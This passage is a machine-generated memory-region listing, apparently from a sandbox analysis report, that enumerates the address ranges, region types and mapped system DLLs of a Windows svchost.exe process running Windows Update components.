= "private_0x0000000001130000" filename = "" Region: id = 1169 start_va = 0x11b0000 end_va = 0x11b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1170 start_va = 0x11c0000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1171 start_va = 0x1240000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 1172 start_va = 0x1250000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 1173 start_va = 0x1260000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 1174 start_va = 0x1270000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 1175 start_va = 0x1280000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 1176 start_va = 0x1290000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 1177 start_va = 0x12a0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 1178 start_va = 0x12b0000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 1179 start_va = 0x12c0000 end_va = 0x12c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1180 start_va = 0x12e0000 end_va = 0x135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 1181 start_va = 0x1370000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 1182 start_va = 0x1390000 end_va = 0x139ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 1183 start_va = 0x13a0000 end_va = 0x13a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 1184 start_va = 0x13b0000 end_va = 0x13bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1185 start_va = 0x13c0000 end_va = 0x13cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1186 start_va = 0x13d0000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1187 start_va = 0x1450000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 1188 start_va = 0x1460000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 1189 start_va = 0x14e0000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 1190 start_va = 0x1560000 end_va = 0x156ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 1191 start_va = 0x1570000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 1192 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 1193 start_va = 0x1600000 end_va = 0x1607fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1194 start_va = 0x1610000 end_va = 0x161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 1195 start_va = 0x1630000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 1196 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 1197 start_va = 0x1730000 end_va = 0x1730fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1198 start_va = 0x1740000 end_va = 0x1742fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1199 start_va = 0x1750000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 1200 start_va = 0x1760000 end_va = 0x1760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001760000" filename = "" Region: id = 1201 start_va = 0x1770000 end_va = 0x17effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 1202 start_va = 0x17f0000 end_va = 0x180ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 1203 start_va = 0x1810000 end_va = 0x181ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1204 start_va = 0x1830000 end_va = 0x18affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 1205 start_va = 0x18c0000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1206 start_va = 0x19e0000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1207 start_va = 0x1ab0000 end_va = 0x1b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 1208 start_va = 0x1b50000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1209 start_va = 0x1bd0000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1210 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1211 start_va = 0x1cd0000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cd0000" filename = "" Region: id = 1212 start_va = 0x1d10000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 1213 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1214 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1215 start_va = 0x1f90000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1216 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1217 start_va = 0x2100000 end_va = 0x21bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1218 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1219 start_va = 0x2270000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 1220 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1221 start_va = 0x23d0000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1222 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1223 start_va = 0x24e0000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1224 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1225 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1226 start_va = 0x2730000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1227 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1228 start_va = 0x27d0000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 1229 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 1230 start_va = 0x2a50000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1231 start_va = 0x2b50000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 1232 start_va = 0x2cc0000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 1233 start_va = 0x2d50000 end_va = 0x2dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 1234 start_va = 0x2e30000 end_va = 0x2eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 1235 start_va = 0x2ec0000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 1236 start_va = 0x2f60000 end_va = 0x2fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1237 start_va = 0x2ff0000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 1238 start_va = 0x3090000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1239 start_va = 0x3110000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1240 start_va = 0x3390000 end_va = 0x340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1241 start_va = 0x3430000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1242 start_va = 0x34b0000 end_va = 0x352ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 1243 start_va = 0x3540000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1244 start_va = 0x35c0000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1245 start_va = 0x3640000 end_va = 0x36bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1246 start_va = 0x36c0000 end_va = 0x373ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 1247 start_va = 0x3740000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1248 start_va = 0x3830000 end_va = 0x38affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 1249 start_va = 0x3910000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1250 start_va = 0x39a0000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 1251 start_va = 0x3a30000 end_va = 0x3aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a30000" filename = "" Region: id = 1252 start_va = 0x3b30000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 1253 start_va = 0x3bb0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 1254 start_va = 0x4040000 end_va = 0x40bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 1255 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 1256 start_va = 0x41e0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 1257 start_va = 0x42e0000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 1258 start_va = 0x4360000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 1259 start_va = 0x4560000 end_va = 0x465ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 1260 start_va = 0x46b0000 end_va = 0x472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 1261 start_va = 0x4740000 end_va = 0x474ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 1262 start_va = 0x4750000 end_va = 0x484ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 1263 start_va = 0x4850000 end_va = 0x494ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 1264 start_va = 0x4950000 end_va = 0x4a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1265 start_va = 0x4a50000 end_va = 0x4b4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a50000" filename = "" Region: id = 1266 start_va = 0x4b50000 end_va = 0x4c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 1267 start_va = 0x4c50000 end_va = 0x5c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 1268 start_va = 0x5c70000 end_va = 0x5ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c70000" filename = "" Region: id = 1269 start_va = 0x5d40000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d40000" filename = "" Region: id = 1270 start_va = 0x5e60000 end_va = 0x5edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 1271 start_va = 0x5f00000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1272 start_va = 0x5fe0000 end_va = 0x605ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fe0000" filename = "" Region: id = 1273 start_va = 0x6060000 end_va = 0x645ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 1274 start_va = 0x64f0000 end_va = 0x656ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064f0000" filename = "" Region: id = 1275 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1276 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1277 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1278 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1279 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1280 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1281 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1282 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1283 start_va = 0x7fef0c60000 end_va = 0x7fef0eb2fff monitored = 0 entry_point = 0x7fef0c6236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1284 start_va = 0x7fef1580000 end_va = 0x7fef158efff monitored = 0 entry_point = 0x7fef1589a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1285 start_va = 0x7fef1a70000 end_va = 0x7fef1c43fff monitored = 0 entry_point = 0x7fef1aa6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 1286 start_va = 0x7fef1d70000 end_va = 0x7fef1db4fff monitored = 0 entry_point = 0x7fef1da3644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1287 start_va = 0x7fef1e00000 end_va = 0x7fef1e1cfff monitored = 0 entry_point = 0x7fef1e02f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 1288 start_va = 0x7fef1f20000 end_va = 0x7fef1f31fff monitored = 0 entry_point = 0x7fef1f290bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1289 start_va = 0x7fef2750000 end_va = 0x7fef29c9fff monitored = 0 entry_point = 0x7fef2782200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1290 start_va = 0x7fef4120000 end_va = 0x7fef413bfff monitored = 0 entry_point = 0x7fef41211a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1291 start_va = 0x7fef4140000 end_va = 0x7fef41a1fff monitored = 0 entry_point = 0x7fef4141198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1292 start_va = 0x7fef41b0000 end_va = 0x7fef41e9fff monitored = 0 entry_point = 0x7fef41b1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1293 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1294 start_va = 0x7fef49c0000 end_va = 0x7fef49d4fff monitored = 0 entry_point = 0x7fef49c1020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1295 start_va = 0x7fef4bd0000 end_va = 0x7fef4bd9fff monitored = 0 entry_point = 0x7fef4bd3994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1296 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1297 start_va = 0x7fef4e30000 end_va = 0x7fef4ea0fff monitored = 0 entry_point = 0x7fef4e751d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1298 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1299 start_va = 0x7fef4ed0000 end_va = 0x7fef4f84fff monitored = 0 entry_point = 0x7fef4f4cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1300 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1301 start_va = 0x7fef4fa0000 end_va = 0x7fef4ff9fff monitored = 0 entry_point = 0x7fef4fddde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1302 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1303 start_va = 0x7fef5030000 end_va = 0x7fef509afff monitored = 0 entry_point = 0x7fef5074344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1304 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1305 start_va = 0x7fef50c0000 end_va = 0x7fef5121fff monitored = 0 entry_point = 0x7fef50fbd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1306 start_va = 0x7fef5130000 end_va = 0x7fef525bfff monitored = 0 entry_point = 0x7fef51e0ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1307 start_va = 0x7fef5260000 end_va = 0x7fef5279fff monitored = 0 entry_point = 0x7fef5273fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1308 start_va = 0x7fef5280000 end_va = 0x7fef5303fff monitored = 0 entry_point = 0x7fef52d1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1309 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1310 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1311 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1312 start_va = 0x7fef5470000 end_va = 0x7fef5488fff monitored = 0 entry_point = 0x7fef5471104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1313 start_va = 0x7fef5490000 end_va = 0x7fef54dffff monitored = 0 entry_point = 0x7fef5491190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1314 start_va = 0x7fef54e0000 end_va = 0x7fef54e7fff monitored = 0 entry_point = 0x7fef54e1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1315 start_va = 0x7fef54f0000 end_va = 0x7fef5514fff monitored = 0 entry_point = 0x7fef5508c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1316 start_va = 0x7fef5520000 end_va = 0x7fef555cfff monitored = 0 entry_point = 0x7fef5521070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1317 start_va = 0x7fef5560000 end_va = 0x7fef55a6fff monitored = 0 entry_point = 0x7fef5561040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1318 start_va = 0x7fef55b0000 end_va = 0x7fef55f1fff monitored = 0 entry_point = 0x7fef55b17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1319 start_va = 0x7fef5600000 end_va = 0x7fef5610fff monitored = 0 entry_point = 0x7fef56014c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1320 start_va = 0x7fef5620000 end_va = 0x7fef56b1fff monitored = 0 entry_point = 0x7fef56951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1321 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1322 start_va = 0x7fef5740000 end_va = 0x7fef5779fff monitored = 0 entry_point = 0x7fef575d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1323 start_va = 0x7fef5960000 end_va = 0x7fef5970fff monitored = 0 entry_point = 0x7fef5969e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1324 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1325 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1326 start_va = 0x7fef5b90000 end_va = 0x7fef5ba6fff monitored = 0 entry_point = 0x7fef5b91060 region_type = mapped_file name = "vsstrace.dll" filename = 